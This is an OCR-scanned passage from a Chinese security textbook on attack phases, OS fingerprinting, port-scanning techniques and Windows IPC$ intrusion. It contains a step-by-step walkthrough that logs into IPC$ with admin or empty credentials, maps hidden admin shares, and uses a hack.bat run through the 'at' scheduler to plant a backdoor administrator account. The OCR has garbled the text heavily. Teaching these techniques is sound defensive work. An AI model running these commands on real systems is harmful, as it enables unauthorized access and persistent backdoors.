家 都 知道 的 漏洞 做 了 手脚 ， 比 如 说 修复 , 或 者 说 挂 马 ， 那么 先入 侵 黑 客 可 能 就 成 为 受害 者 ， 
因此 他 们 会 修补 漏洞 。 

7. 清除 痕迹 

当 黑 客 入 侵 完 成 后 ， 他 们 会 清理 入 侵 的 痕迹 ， 需 要 清理 的 包括 应 用 程序 日 志 、 安 全 日 
、 系 统 日 志 。 关 于 这 点 我 们 将 在 2.5 节 重 点 介绍 。 


2.4 网 络 攻击 的 实施 


无 论 网 络 入 侵 者 攻击 的 是 什么 类 型 的 目标 ， 其 所 采用 的 攻击 手段 和 过 程 都 有 一 定 的 共 
性 。 网 络 攻击 一 般 分 为 如 下 几 个 步骤 。 

1. 调查 、 收 集 和 判断 目标 网 络 系统 的 网 络 结构 等 信息 

入 侵 者 利用 操作 系统 中 现 有 的 网 络 工 具 或 协议 ， 收 集 远程 目标 系统 中 各 个 主机 的 相关 
信息 ， 为 对 目标 系统 进行 进一步 分 析 和 判断 做 准备 。 

2. 制定 攻击 策略 和 确定 攻击 目标 

收集 到 远程 目标 的 一 般 网 络 信息 后 ， 如 何 确定 攻击 对 象 ， 这 与 入 侵 者 所 制定 的 攻击 策 
略 有 关 。 一 般 情 况 下 ， 入 侵 者 想 要 获得 的 是 1 个 主 系统 或 1 个 可 用 的 最 大 网 段 的 根 访问 权 
限 ， 通 常 只 要 成 功 入 侵 1 台 主 机 后 ， 就 可 以 控制 整个 网 络 。 

3. 扫描 目标 系统 

入 侵 者 将 扫描 远程 目标 系统 ， 以 寻找 该 系统 的 安全 漏洞 或 安全 弱点 ， 并 试图 找到 安全 
性 最 薄弱 的 主机 作为 入 侵 对 象 。 因 为 某 些 系统 主机 的 管理 员 素 质 不 高 ， 而 造成 目标 系统 配 
置 不 当 ， 这 就 会 给 入 侵 者 机 会 。 而 且 有 时 攻破 1 个 主机 就 意味 着 可 以 攻破 整个 系统 。 

4. 攻击 目标 系统 

入 侵 者 使 用 扫描 方法 探测 到 目标 系统 的 一 些 有 用 信息 并 进行 分 析 ， 寻 找到 目标 系统 由 
于 种 种 原因 而 存在 的 安全 漏洞 后 ， 就 可 以 进行 攻击 并 试图 获得 访问 权限 。 一 旦 获得 访问 权 
限 ， 入 侵 者 就 可 以 搜索 目录 ， 定 位 感 兴趣 的 信息 ， 并 将 信息 传输 、 存 储 起 来 。 通 过 这 台 薄 
弱 的 主机 , 入 侵 者 也 可 以 对 与 本 机 建立 了 访问 连接 和 信任 关系 的 其 他 网 络 计算 机 进行 攻击 。 


让 
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2.4.1 网 络 信息 搜集 


了 解 操作 系统 的 目的 是 要 了 解 系统 内 存 的 工作 状态 ， 了 解 它 是 以 什么 方式 、 基 于 什么 
样 的 技术 来 控制 内 存 ， 以 及 是 怎样 来 处 理 输入 与 输出 的 数据 的 。 世 上 任何 东西 都 不 可 能 是 
尽善尽美 的 (当然 这 也 是 我 们 不 断 追 求 的 动力 所 在 )， 复 杂 的 计算 机 系统 更 是 如 此 ， 它 在 控 
制 内 存 与 处 理 数据 的 过 程 中 总 是 有 可 能 出 错 的 (特别 是 在 安装 了 其 他 的 应 用 程序 以 后 )， 系 
统 本 身 也 会 存在 各 种 各 样 的 弱点 与 不 足 之 处 。 黑 客 之 所 以 能 够 入 侵 ， 就 是 利用 了 这 些 弱 点 
与 不 足 。 现 在 网 上 流行 的 各 种 各 样 的 入 侵 工 具 ， 都 是 黑客 在 分 析 了 系统 的 弱点 及 存在 的 不 
足 之 后 编写 出 来 的 (其 中 以 “缓冲 区 溢出 ”最 为 常见 )。 

作为 一 般 的 黑客 ， 只 要 善于 使 用 现成 的 入 侵 工具 ， 就 可 以 达到 入 侵 的 目的 。 但 是 因为 
不 同 的 系统 ， 其 工作 原理 不 一 样 ， 所 以 不 同 的 入 侵 工 具 只 能 针对 相应 的 操作 系统 。 因 此 ， 
对 操作 系统 的 识别 是 必 不 可 少 的 ， 这 就 需要 对 操作 系统 有 相当 的 了 解 ， 并 掌握 一 定 的 网 络 
基础 知识 。 

下 面 是 一 些 简 单 的 操作 系统 识别 方法 。 


1. 用 ping 来 识别 操作 系统 


ping 命令 的 基本 格式 是 : ping hostname。 
其 中 hostname 是 目标 计算 机 的 地 址 。 
例 : ping 192.168.0.1 

下 面 是 具体 的 操作 方法 。 


GMNoping L012 

Pinging 10.1.1.2 with 32 bytes of data: 

Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 
Ping statistics for 10.1.1.2: 

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times in milli-seconds: 
Minimum = Oms, Maximum = Oms, Average = 0ms 
Ca:\> 

CzNzpipgil02sls6 

Pinging 10.1.1.6 with 32 bytes of data: 

Request timed out. 

Reply from 10.1.1.6: bytes=32 time=250ms TTL=237 
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237 
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237 
Ping statistics for 10.1.1.6: 
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Packets: Sent = 4, Received = 3, Lost = 1 (25% loss), 
Approximate round trip times in milli-seconds: 


Minimum = 234ms, Maximum = 250ms, Average = 179ms 


根据 ICMP 报 文 的 TIL 的 值 ， 就 可 以 大 概 知 道 主 机 操作 系统 的 类 型 。 例 如 : TTL=125 
左右 的 主机 应 该 是 Windows 系列 的 系统 ，TTL=235 左右 的 主机 应 该 是 UINX 系统 。 如 上 面 
的 两 个 例子 ，10.1.1.2 就 是 Windows 2000 系统 ， 而 10.1.1.6 则 是 UINX(Sunos 5.8) 系 统 。 这 
是 因为 不 同 的 操作 系统 对 ICMP 报 文 的 处 理 与 应 答 是 不 同 的 ，TTL 值 每 过 一 个 路 由 器 会 减 
1， 所 以 造成 了 TTL 回复 值 的 不 同 。 对 于 TTL 值 与 操作 系统 类 型 的 对 应 ， 还 要 靠 大 家 平时 
多 多 注意 观察 和 积累 。 

2. 根据 连接 端口 返回 的 信息 判断 操作 系统 


这 种 方法 应 该 说 是 用 得 最 多 的 一 种 ， 下 面 来 看 一 个 实例 。 
假如 机 器 开 了 80 端口 ， 就 可 以 用 Telnet 连接 它 。 


Microsoft Windows 2000 [Version 5.00.2195] 
= 版 权 所 有 1985-1998 Microsoft Corp. 
C:\>telnet 10.1.1.2 80 

输入 get 回 车 


如 果 返 回 ; 


HTTP/1.1 400 Bad Request 
Server: Microsoft-IIS/5.0 
Date: Fri, 11 Jul 2003 02:31:55 GMT 


Content-Type: text/html 
Content-Length: 87 

The parameter is incorrect. 
遗失 对 主机 的 连接 。 

CcC:\> 


那么 这 台 主 机 就 肯定 是 Windows 系统 。 
如 果 返 回 : 


Method Not Implemented 

get to / not 

supported. 

Invalid method in request get 

Apache/1.3.27 Server at gosiuniversity.com Port 80 
遗失 对 主机 的 连接 。 

CC:N> 


那么 多 数 就 是 UINX 系统 了 。 
如 果 此 主机 开 了 21 端口 ， 我 们 可 以 直接 使 用 FTP 连接 ， 如 : 
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C:\>ftp 10.1.1.2 
如 果 返 回 : 


Connected to 10.1.1.2. 
220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0). 
User (10.1.1.2none)): 


那么 这 就 肯定 是 一 台 操作 系统 为 Windows 2000 的 主机 了 , 返回 的 信息 中 也 包括 主机 名 , 在 
上 面 的 例子 中 ， 主 机 名 就 是 sgyyq-c43s950。 这 个 FTP 是 Windows 的 IIS 自 带 的 一 个 FTP 
服务 器 。 

如 果 返 回 : 


Connected to 10.1.1.3. 
220 Serv-U FTP Server v4.0 for WinSock ready... 
User (10.1.1.3none)): 


也 可 以 肯定 它 是 Windows 系统 ， 因 为 Serv-U FTP 是 一 个 专 为 Windows 平台 开发 的 FTP 服 
务 器 。 
如 果 返 回 : 


Connected to 10.1.1.3. 
220 ready, dude (vsFTPd 1.1.0: beat me, break me) 
User (10.1.1.3none)): 
那么 这 就 是 一 台 操作 系统 为 UINX 的 主机 了 。 
如 果 主 机 打开 了 23 端口 ， 可 以 直接 通过 Telnet 连接 。 
如 果 返 回 : 


Microsoft ™ Windows ™ Version 5.00 (Build 2195) 
Welcome to Microsoft Telnet Service 
Telnet Server Build 5.00.99201.1 
login: 
那么 这 肯定 是 一 台 操作 系统 为 Windows 的 主机 了 。 
如 果 返 回 : 
SunoSs 5.8 


login: 
那么 这 就 是 一 台 操作 系统 为 UINX 的 主机 了 ， 并 且 版 本 是 SunOS 5.8。 
3. 利用 专门 的 软件 来 识别 


这 种 有 识别 操作 系统 功能 的 软件 ， 多 数 采用 的 是 操作 系统 协议 栈 识别 技术 。 这 是 因为 
不 同 的 厂家 在 编写 自己 的 操作 系统 时 ，TCP/IP 协议 虽然 是 统一 的 ， 但 对 TCP/IP 协议 栈 没 
有 做 统一 的 规定 , 厂家 可 以 按 自己 的 要 求 来 编写 TCP/IP 协议 栈 ， 从 而 造成 了 操作 系统 之 间 
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协议 栈 的 不 同 。 因 此 可 以 通过 分 析 协 议 栈 的 不 同 来 区 分 不 同 的 操作 系统 ， 只 要 建立 起 协议 
栈 与 操作 系统 对 应 的 数据 库 ， 就 可 以 准确 识别 操作 系统 了 。 目 前 来 说 ， 用 这 种 技术 识别 操 
作 系统 是 最 准确 也 是 最 科学 的 。 因 此 也 被 称 为 识别 操作 系统 的 “指纹 技术 ”。 当 然 识 别 的 
能 力 与 准确 性 ， 就 要 看 各 软件 数据 库 的 建立 情况 了 。 

下 面 简单 介绍 两 款 有 识别 功能 的 软件 。 

(1) 著名 的 Nmap, 是 Linux、FreeBSD 、UNIX、Windows 下 的 网 络 扫描 和 嗅 探 工具 包 ， 
是 评估 网 络 系统 安全 的 重要 软件 ， 其 基本 功能 有 三 个 : 一 是 探测 一 组 主机 是 否 在 线 ; 二 是 
扫描 主机 端口 ， 嗅 探 所 提供 的 网 络 服务 ;三 是 推断 主机 所 用 的 操作 系统 。Nmap 可 用 于 扫 
描 仅 有 两 个 节点 的 LAN, 也 可 以 扫描 500 个 节点 以 上 的 网 络 。 可 以 深入 探测 UDP 或 者 TCP 
端口 ， 还 可 以 将 所 有 探测 结果 记录 到 各 种 格式 的 日 志 中 ， 供 进一步 分 析 操作 。 

(2) 天 眼 ， 此 软件 采用 的 是 被 动 式 的 探测 方法 。 使 用 此 软件 探测 目标 主机 的 系统 时 ， 
不 向 目标 系统 发 送 数据 包 ， 只 是 被 动 地 探测 网 络 上 的 通信 数据 ， 通 过 分 析 这 些 数据 来 判断 
操作 系统 的 类 型 。 配 合 superscan 使 用 ， 效 果 很 好 。 有 具体 的 使 用 方法 在 此 就 不 具体 介绍 了 ， 
有 兴趣 的 学 生 可 以 到 网 上 搜索 一 下 关于 天 眼 使 用 方法 的 文章 。 


2.4.2 ”端口 扫描 


一 个 端口 就 是 一 个 潜在 的 通信 通道 ， 也 就 是 一 个 入 侵 通道 。 对 目标 计算 机 进行 端口 扫 
描 ， 能 得 到 许多 有 用 的 信息 。 进 行 扫描 的 方法 很 多 ， 可 以 手工 进行 扫描 ， 也 可 以 用 端口 扫 
描 软 件 进行 扫描 。 

在 手工 进行 扫描 时 ， 需 要 熟悉 各 种 命令 ， 并 对 命令 执行 后 的 输出 进行 分 析 ; 用 扫描 软 
件 进行 扫描 时 ， 许 多 扫描 器 软件 都 有 分 析 数 据 的 功能 。 

通过 端口 扫描 ， 可 以 得 到 许多 有 用 的 信息 ， 从 而 发 现 系统 的 安全 漏洞 。 

1. 什么 是 扫描 器 

扫描 器 是 一 种 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 ， 使 用 扫描 器 可 以 不 留 痕迹 
地 发 现 远程 服务 器 的 各 种 TCP 端口 的 分 配 及 提供 的 服务 和 它们 的 软件 版 本 , 这 就 能 让 我 们 
间接 地 或 直观 地 了 解 到 远程 主机 所 存在 的 安全 问题 。 

工作 原理 : 扫描 器 通过 选用 远程 TCP/IP 不 同 的 端口 的 服务 ， 并 记录 目标 给 予 的 回答 ， 
来 搜集 关于 目标 主机 的 各 种 有 用 的 信息 (比如 : 是 否 能 用 匿名 登录 .是否 有 可 写 的 FTP 目录 、 
是 否 能 用 TELNET。 


2. 扫描 器 能 干什么 


扫描 器 并 不 是 一 个 直接 的 攻击 网 络 漏洞 的 程序 ， 它 只 能 帮助 我 们 发 现 目标 机 的 某 些 内 
在 的 弱点 。 一 个 好 的 扫描 器 能 对 它 得 到 的 数据 进行 分 析 ， 帮 助 我 们 查找 目标 主机 的 漏洞 。 
但 它 不 会 提供 进入 一 个 系统 的 详细 步骤 。 

扫描 器 应 该 有 三 项 功能 : 发 现 一 个 主机 或 网 络 ;一 旦 发 现 一 台 主机 ， 就 会 发 现 主机 上 
运行 的 服务 程序 ， 通 过 测试 这 些 服务 程序 ， 找 出 漏洞 。 

编写 扫描 器 程序 不 仅 要 有 丰富 的 TCP/IP 程序 编写 和 C、Perl 或 SHELL 语言 编写 的 知 
识 ， 还 需要 一 些 Socket 编程 的 背景 ， 开 发 扫描 器 程序 是 一 项 成 就 感 很 强 的 项 目 ， 它 通常 能 
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使 程序 员 感到 很 满意 。 
3. 常用 的 端口 扫描 技术 


1) ”TCP connect0 扫 描 

这 是 最 基本 的 TCP 扫描 。 操作 系统 提供 的 connect0 系 统 调用 ， 用 来 与 每 一 个 感 兴趣 的 
目标 计算 机 的 端口 进行 连接 。 如 果 端 口 处 于 侦 听 状态 ， 那 么 connect0 就 能 成 功 。 否 则 ， 这 
个 端口 是 不 能 用 的 ， 即 没有 提供 服务 。 这 个 技术 的 一 个 最 大 的 优点 是 不 需要 任何 权限 ， 系 
统 中 的 任何 用 户 都 有 权利 使 用 这 个 调用 。 该 技术 的 另 一 个 好 处 就 是 速度 快 ， 如 果 对 每 个 目 
标 端口 都 以 线性 的 方式 连接 ， 使 用 单独 的 connectO 调 用 ， 那 么 将 会 花费 相当 长 的 时 间 ， 这 
时 用 户 可 以 通过 同时 打开 多 个 套 接 字 ， 来 实现 加 速 扫描 。 使 用 非 阻塞 IO 允许 用 户 设 置 一 
个 低 的 时 间 用 尽 周期 ， 同 时 观察 多 个 套 接 字 。 但 这 种 方法 的 缺点 是 很 容易 被 发 觉 ， 并且 会 
被 过 滤 掉 。 目 标 计 算 机 的 logs 文件 会 显示 一 连 串 的 连接 和 连接 时 出 错 的 服务 消息 ， 并 且 能 
很 快 使 它 关 闭 。 

2) ”TCP SYN 扫描 

这 种 技术 通常 认为 是 “ 半 开 放 ” 扫 描 ， 这 是 因为 扫描 程序 没有 必要 打开 一 个 完全 的 
TCP 连接 。 扫 描 程序 发 送 的 是 一 个 SYN 数据 包 ， 好 像 准备 打开 一 个 实际 的 连接 并 等 待 反 
应 一 样 (参考 TCP 的 三 次 握手 建立 一 个 TCP 连接 的 过 程 )。 一 个 SYNIACK 的 返回 信息 表示 
端口 处 于 侦 听 状态 。 一 个 RST 返回 , 表示 端口 没有 处 于 侦 听 状态 。 如 果 收 到 一 个 SYNIACK， 
则 扫描 程序 必须 再 发 送 一 个 RST 信号 ， 来 关闭 这 个 连接 过 程 。 这 种 扫描 技术 的 优点 在 于 一 
般 不 会 在 目标 计算 机 上 留 下 记录 。 但 这 种 方法 的 一 个 缺点 是 ， 必 须要 有 root 权限 才能 建立 
自己 的 SYN 数据 包 。 

3) ”TCP FIN 扫描 

有 的 时 候 可 能 SYN 扫描 也 不 够 秘密 。 一 些 防火 墙 和 包 过 滤器 会 对 一 些 指定 的 端口 进行 
监视 ， 有 的 程序 能 检测 到 这 些 扫描 。 相 反 ，FIN 数据 包 可 能 会 在 没有 任何 麻烦 的 情况 下 通 
过 。 这 种 扫描 方法 的 思想 是 : 关闭 的 端口 会 用 适当 的 RST 来 回复 FIN 数据 包 。 另 外 ， 打 开 
的 端口 会 忽略 对 FIN 数据 包 的 回复 。 这 种 方法 和 系统 有 一 定 的 关系 ， 有 的 系统 不 管 端口 是 
否 打开 ， 都 回复 RST， 这 样 ， 这 种 扫描 方法 就 不 适用 了 。 这 种 方法 在 区 分 Unix 和 NT 时 ， 
非常 有 用 。 

4) 人 P 段 扫描 

IP 段 扫 描 不 能 算是 新 方法 ， 它 是 在 其 他 技术 的 基础 上 变化 而 来 的 。 它 并 不 是 直接 发 送 
TCP 探测 数据 包 ， 而 是 将 数据 包 分 成 两 个 较 小 的 IP 段 后 进行 发 送 。 它 将 一 个 TCP 头 分 成 
好 几 个 数据 包 ， 所 以 过 滤器 就 很 难 探测 到 。 但 是 在 使 用 该 方法 时 必须 小 心 ， 一 些 程序 在 处 
理 这 些小 数据 包 时 会 产生 一 些 麻烦 。 

5) ”TCP 反 向 ident 扫描 

ident 协议 允许 (rfe1413) 看 到 通过 TCP 连接 的 任意 进程 拥有 者 的 用 户 名 ,即使 这 个 连接 
不 是 由 这 个 进程 开始 的 。 举 个 例子 : 连接 到 http 端口 ,然后 用 ident 来 发 现 服务 器 是 否 正在 
以 root 权限 运行 。 这 种 方法 只 能 在 和 目标 端口 建立 了 一 个 完整 的 TCP 连接 后 才能 看 到 。 

6) FTP 返回 攻击 

FTP 的 一 个 有 趣 的 特点 是 ， 它 支持 代理 (proxy)FTP 连接 。 即 入 侵 者 可 以 从 自己 的 计算 
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机 acom 和 目标 主机 target.com 的 FTP server-PI( 协 议 解释 器 ) 连 接 , 建立 一 个 控制 通信 连接 。 
然后 , 请 求 这 个 server-PI 激活 一 个 有 效 的 server-DTP( 数 据 传输 进程 ) 来 给 mternet 上 的 任何 
地 方 发 送 文 件 。 这 个 协议 的 缺点 是 “可 以 用 来 发 送 不 能 跟踪 的 邮件 和 新 闻 ， 给 许多 服务 器 
造成 打击 ， 用 尽 磁盘 ”。 

我 们 利用 这 种 方法 的 目的 是 从 一 个 代理 的 FTP 服务 器 来 扫描 TCP 端口 。 这 样 , 用 户 能 
在 一 个 防火 墙 后 面 连接 到 一 个 FTP 服务 器 ， 然 后 扫描 端口 (这 些 原 来 有 可 能 被 阻塞 )。 如 果 
FTP 服务 器 允许 从 一 个 目录 读 写 数据 ， 用 户 就 能 发 送 任意 的 数据 到 发 现 的 打开 的 端口 。 

端口 扫描 是 使 用 PORT 命令 对 目标 计算 机 上 的 某 个 端口 侦 听 。 然 后 入 侵 者 用 LIST 命 
令 列 出 当前 目录 ， 其 结果 通过 Server-DTP 发 送出 去 。 如 果 目 标 主机 某 个 端口 正在 被 侦 听 ， 
传输 就 会 成 功 (产生 一 个 150 或 226 的 回应 )。 否则 , 会 出 现 “425 Can’t build data connection: 
Connection refused.”。 然 后 ， 使 用 另 一 个 PORT 命令 ， 尝 试 目标 计算 机 上 的 下 一 个 端口 。 
这 种 方法 的 优点 很 明显 ， 难 以 跟踪 ， 能 穿 过 防火 墙 ;， 主要 缺点 是 速度 很 慢 ， 有 的 FTP 服务 
器 最 终 能 得 到 一 些 线索 ， 从 而 关闭 代理 功能 。 

这 种 方法 能 成 功 的 情景 : 


220 XXXXXXX.Com FTP server (Version wu-2.4(3) Wed Dec 14) ready. 

220 XXX.XXX.XXX.edu FTP server ready. 

220 xx.Telcom.xxxx.EDU FTP server (Version wu-2.4(3) Tue Jun 11) ready. 
220 lem FTP server (SunOs 4.1) ready. 

220 XXX.XXX.eS FTP server (Version wu-2.4(11) Sat Apr 27) ready. 


220 elios FTP server (Sun0S 4.1) ready 

这 种 方法 不 能 成 功 的 情景 : 

220 wcarchive.cdrom.com FTP server (Version DG-2.0.39 Sun May 4) ready. 
220 XXX.XX.XXXXX.EDU Version wu-2.4.2-academ[BETA-12] (1) Fri Feb 7 

220 ftp Microsoft FTP Service (Version 3.0) . 


220 XXX FTP server (Version wu-2.4.2-academ[BETA-11] (1) Tue Sep 3) ready. 
220 xxx.unc.edu FTP server (Version wu-2.4.2-academ[BETA-13] (6) ) ready. 


7) UDP ICMP 端口 不 能 到 达 扫 描 

这 种 方法 与 上 面 几 种 方法 的 不 同 之 处 在 于 使 用 的 是 UDP 协议 。 由 于 这 个 协议 很 简单 ， 
所 以 扫描 变 得 相对 比较 困难 。 这 是 由 于 打开 的 端口 对 扫描 探测 并 不 发 送 一 个 确认 ， 关 闭 的 
端口 也 并 不 需要 发 送 一 个 错误 数据 包 。 幸运 的 是 , 许多 主机 在 用 户 向 一 个 未 打开 的 UDP 端 
口 发 送 一 个 数据 包 时 ,会 返回 一 个 ICMP_PORT_UNREACH 错误 信息 ， 这 样 用 户 就 能 发 现 
哪个 端口 是 关闭 的 。 但 是 UDP 和 ICMP 错误 信息 都 不 能 保证 被 完全 反馈 ， 因 此 ， 在 一 个 包 
看 上 去 已 丢失 的 时 候 ， 这 种 扫描 器 必须 实现 重新 传输 。 这 种 扫描 方法 是 很 慢 的 ， 因 为 RFC 
对 ICMP 错误 消息 的 产生 速率 做 了 规定 。 同 样 ， 这 种 扫描 方法 需要 具有 root 权限 。 

8) UDP recvffom0 和 write0 扫描 

当 非 root 用 户 不 能 直接 读 到 端口 不 能 到 达 的 错误 时 ，Linux 能 间接 地 在 它们 到 达 时 通 
知 用 户 。 比 如 ， 对 一 个 关闭 的 端口 的 第 2 个 writeO 调 用 将 失败 。 在 非 阻塞 的 UDP 套 接 字 上 
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调用 recvfrom0 时 ， 如 果 ICMP 出 错 ， 还 没有 到 达 时 会 返回 EAGAIN- 重 试 。 如 果 ICMP 到 
达 时 ， 返 回 ECONNREFUSED， 表 明 连 接 被 拒绝 。 这 就 是 用 来 查看 端口 是 否 打 开 的 技术 。 

9) ”ICMP echo 扫描 

这 并 不 是 真正 意义 上 的 扫描 。 但 有 时 通过 ping， 在 判断 一 个 网 络 上 主机 是 否 开机 时 非 
常 有 用 。 

典型 的 扫描 工具 Nmap 已 在 2.4.1 节 中 作 了 详细 的 介绍 。 


2.4.3 ”基于 认证 的 入 侵 防范 


1. IPC$ 入 侵 


IPC$ 本 来 主要 是 用 于 远程 管理 计算 机 的 ， 但 实际 上 往往 被 入 侵 者 用 来 与 远程 主机 实现 
通信 和 控制 。 入 侵 者 能 够 利用 它 做 到 : 建立 、 复 制 、 删 除 远程 计算 机 文件 ， 在 远程 计算 机 
上 执行 命令 。 

1) ”远程 文件 操作 

(1) IPC 相关 知识 : IPC 即 Internet Process Connection 的 缩写 ， 可 理解 为 “命名 管道 ” 
资源 ， 用 来 在 两 台 计 算 机 进程 之 间 建 立 通信 连接 ， 而 IPC 后 面 的 是 Windows 系统 所 使 用 
的 隐藏 符号 ， 因此 “IPC$” 表 示 隐 藏 的 IPC 共享 。IPC$ 是 Windows NT/2000/XP/2003 的 一 
项 特有 功能 ， 一 些 网 络 程序 的 数据 交换 可 以 建立 在 它 上 面 ， 实 现 远程 访问 管理 计算 机 。IPC 
连接 就 好 像 是 挖 好 的 地 道 ， 通 信 程 序 就 通过 这 个 “地 道 ” 访 问 目标 主机 。 默 认 情 况 下 IPC 
是 共享 的 ， 通 过 它 ， 入 侵 者 能 实现 远程 控制 目标 主机 。 

Windows 系统 在 安装 完成 后 ， 自 动 设置 共享 的 目录 为 : C 盘 、D 盘 、E 盘 、ADMIN 目 
录 (C:\WINNTVD) 等 ， 即 为 C$8、D$、E$、ADMIN$ 等 。 但 这 些 共享 也 是 隐藏 的 ， 只 有 管理 员 
能 对 它们 进行 远程 操作 ， 在 MS-DOS 中 键入 “net share ”命令 可 以 查看 本 机 共享 资源 。 

几 个 常用 的 Dos 命令 如 下 。 

net user: 系统 账号 类 操作 。 

net localgroup: 系统 组 操作 。 

net use: 远程 连接 、 映 射 操作 。 

net send: 信使 命令 。 

net time: 查看 远程 主机 系统 时 间 。 

netstat -n: 查看 本 机 网 络 连接 状态 。 

nbtstat -a IP: 查看 指定 卫 主机 的 NetBIOS 信息 。 

(2) 实例 : 下 面 通过 一 个 实例 介绍 如 何 建立 和 断 开 IPC$ 连 接 ， 以 及 入 侵 者 是 如 何 将 远 
程 磁盘 映射 到 本 地 的 。 通 过 IPC$ 连 接 进行 入 侵 的 条 件 是 已 获得 目标 主机 管理 员 账 号 和 密 
码 。 具 体 步 又 如 下 。 

@ 打开 cmd 命令 行 窗口 。 

@@ 建立 IPC$ 连 接 。 

使 用 命令 : 


net use \\IP\IPC$ "PASSWD" /USER: "ADMIN" 与 目标 主机 建立 IPC$ 连 接 。 
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参数 说 明 : 全 一 一 目标 主机 的 他; IPC$ 一 一 指明 是 IPC$ 连 接 ， PASSWD 一 一 已 经 获得 
的 管理 员 密 码 ; ADMIN 一 一 已 经 获得 的 管理 员 账 号 。 
一 水 例 所 


net use \\192.168.1.60\ipc$ "" /user:"administrator" 


图 映射 网 络 驱动 器 。 
使 用 命令 : 


net use Y: \\192.168.1.60\D$ 


该 命令 表示 把 目标 主机 192.168.1.60 上 面 的 隐藏 D 盘 映 射 为 本 机 的 Y 盘 , 映射 成 功 后 ， 
打开 “我 的 电脑 ”会 发 现 多 出 一 个 了 盘 ， 上 面 写 着 “192.168.1.60”。 

@ 查找 指定 文件 。 

右键 单 击 Y 盘 ， 在 弹出 的 菜单 中 选择 “搜索 ”命令 ， 输 入 要 查找 的 关键 字 “**”， 等 
待 一 会 儿 即 可 得 到 查找 结果 ， 可 以 将 找到 的 文件 进行 复制 、 粘 贴 等 操作 ， 像 对 本 地 磁盘 中 
的 文件 进行 操作 一 样 。 

加 断 开 连 接 。 

输入 “net use* /del” 命 令 断 开 所 有 的 IPC$ 连 接 。 输 入 “netuse \ 目 标 IPPCS /del” 可 
以 删除 指定 目标 他 的 IJPC$ 连 接 。 

2)” 留 后 门 账号 

(1) 相关 知识 。 

利用 批 处 理 bat 文件 和 计划 任务 来 达到 目的 。 下 面 是 一 些 相关 的 DOS 命令 。 

at: 用 来 建立 计划 任务 。 

net time: 用 来 查看 目标 计算 机 系统 时 间 ， 以 便 使 用 计划 任务 指定 时 间 。 

net user: 账号 名 : 查看 账号 属性 。 

net user: 查看 账号 。 

net user name passwd /add: 建立 账号 。 

net user name passwd /del: 删除 账号 。 

net localgroup: 用 来 管理 工作 组 ， 用 法 同 net user。 

(2) 建立 后 门 账号 ， 步 又 如 下 。 

@ 编写 BAT 文 件 。 

打开 记事 本 ， 输 入 “net user emile 123456 /add” 和 “net localgroup administrators emile 
/add”， 然 后 把 文件 另存 为 “hack.bat”， 保 存在 cmd 当前 默认 目录 下 。 

@ 与 目标 主机 建立 IPC$ 连 接 ， 以 192.168.1.60 为 例 进行 讲解 。 

打开 cmd 窗口 ， 分 别 执行 命令 : 

net use \\192.168.1.60\ipc$ ""” /user:"administrator™" 

net use z: \\192.168.1.60\C$ 

图 复制 bat 文件 到 目标 主机 。 


在 cmd 窗口 输入 copy hack.bat \192.168.1.60\C$， 把 文件 复制 到 目标 位 置 ; 也 可 以 打开 
映射 驱动 器 用 图 形 界面 直接 进行 复制 操作 。 
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@ ”通过 计划 任务 使 远程 主机 执行 hack.bat 文件 。 

首先 输入 “net time \IP” 查 看 远程 主机 的 系统 时 间 , 再 输入 “at NIP TIME COMMAND” 
命令 在 远程 主机 上 建立 计划 任务 。 

参数 说 明 : 卫 一 一 目标 主机 JP; TIME 一 一 设 定 计 划 任 务 执行 的 时 间 ; COMMAND 一 一 
计划 任务 要 执行 的 命令 ， 如 此 处 为 C:\hack.bat。 

计划 任务 添加 完毕 后 ， 使 用 命令 “net use * /del” 断 开 IPC$ 连 接 。 

@ ”验证 账号 是 否 成 功 建立 。 

等 待 一 段 时 间 ， 估 计 远 程 主机 已 经 执行 hack.bat 文件 后 ， 通 过 用 新 账号 建立 IPC$ 连 接 
来 验证 是 否 成 功 建立 “emile” 账 号 ， 连 接 成 功 则 说 明 账号 成 功 建立 。 

3) ”IPCS$ 空 连接 漏洞 

(1) 漏洞 描述 : IPC$ 本 来 要 求 客户 机 要 有 足够 权限 才能 连接 到 目标 主机 ， 然 而 IPC$ 连 
接 漏 洞 允许 客户 端 只 使 用 空 用 户 名 、 空 密码 就 可 以 与 目标 主机 成 功 建立 连接 。 入 侵 者 利用 
该 漏洞 可 以 与 目标 主机 进行 空 连接 ， 但 无 法 执行 管理 类 操作 ， 例 如 不 能 执行 映射 网 络 驱动 
器 、 上 传 文件 、 执 行 脚本 等 命令 。 虽 然 入 侵 者 不 能 通过 该 漏洞 直接 得 到 管理 员 权 限 ， 但 也 
可 用 来 探测 目标 主机 的 一 些 关键 信息 ， 在 “信息 搜集 ”中 发 挥 一 定 的 作用 。 

(2) 实例 : 通过 IPC$ 空 连接 获取 信息 ， 步 又 如 下 。 

@ 建立 IPC$ 空 连接 ， 如 果 空 连接 建立 成 功 ， 反 映 了 目标 主机 的 “不 坚固 ”程度 。 

加 输入 “net time WP” 查 看 目标 主机 的 时 间 信 息 ， 入 侵 者 可 以 通过 目标 主机 的 时 间 
信息 ， 推 断 出 目标 主机 所 在 的 国家 或 地 区 。 

图 ”获取 目标 主机 上 的 用 户 信息 ，USERINFO.exe 和 X-Scan 是 常用 的 两 款 获取 用 户 信 
息 的 工具 。 

@ USERINFO 是 利用 IPCS$ 漏 洞 来 查看 目标 主机 用 户 信息 的 工具 ， 通 过 USERINFO 

来 查看 目标 主机 用 户 信息 的 时 候 , 并 不 需要 事先 建立 IPC$ 空 连接 .USERINFO NIP 
USER 命令 用 来 查看 目标 IP 上 USER 用 户 的 信息 ， 然 后 根据 反馈 的 结果 进行 具体 
分 析 。 

e@ XX-Scan 扫描 器 也 是 利用 目标 主机 存在 的 PC$ 空 连接 漏洞 , 获取 用 户 信息 ,用 法 略 。 

4) IPC$ 入 侵 常 见 问题 

(1) 与 远程 主机 建立 IPC$ 连 接 , 本 地 机 需要 具备 的 条 件 是 : 操作 系统 是 Windows 2000 
及 以 上 ， 而 不 能 使 用 Windows 9x; 本 地 机 也 应 开放 IPC$, 在 获得 远程 主机 管理 员 账 号 和 密 
